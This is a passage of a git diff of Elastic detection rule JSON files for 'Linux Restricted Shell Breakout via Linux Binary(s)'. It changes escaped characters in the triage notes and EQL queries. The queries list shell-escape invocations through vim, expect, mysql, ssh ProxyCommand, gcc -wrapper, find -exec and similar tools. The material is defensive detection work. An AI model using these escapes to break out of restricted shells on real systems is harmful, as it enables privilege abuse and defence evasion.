same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\",\"nawk\", \"mawk\", \"awk\", \"gawk\", \"tar\", \"zip\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;dash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/dash 0\u003c\u00262 1\u003e\u00262\"))\n )\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\",\"nawk\", \"mawk\", \"awk\", \"gawk\", \"tar\", \"zip\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\"))\n )\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -99,7 +99,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_105.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_105.json index 9bf5128a93e..f625af5b7a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_105.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\",\"nawk\", \"mawk\", \"awk\", \"gawk\", \"tar\", \"zip\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;dash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/dash 0\u003c\u00262 1\u003e\u00262\"))\n )\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\",\"nawk\", \"mawk\", \"awk\", \"gawk\", \"tar\", \"zip\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\"))\n )\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -97,7 +97,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_106.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_106.json index 6f36a8350c1..d9a9f8a4484 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_106.json @@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"*awk\", \"git\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\" and process.parent.args == \"-p\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"*awk\", \"git\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\" and process.parent.args == \"-p\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ 